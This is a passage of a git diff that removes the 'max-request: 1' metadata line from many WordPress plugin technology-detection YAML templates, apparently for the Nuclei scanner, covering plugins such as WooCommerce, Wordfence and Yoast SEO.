@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 41baa25eb7..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index ee389af6ec..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
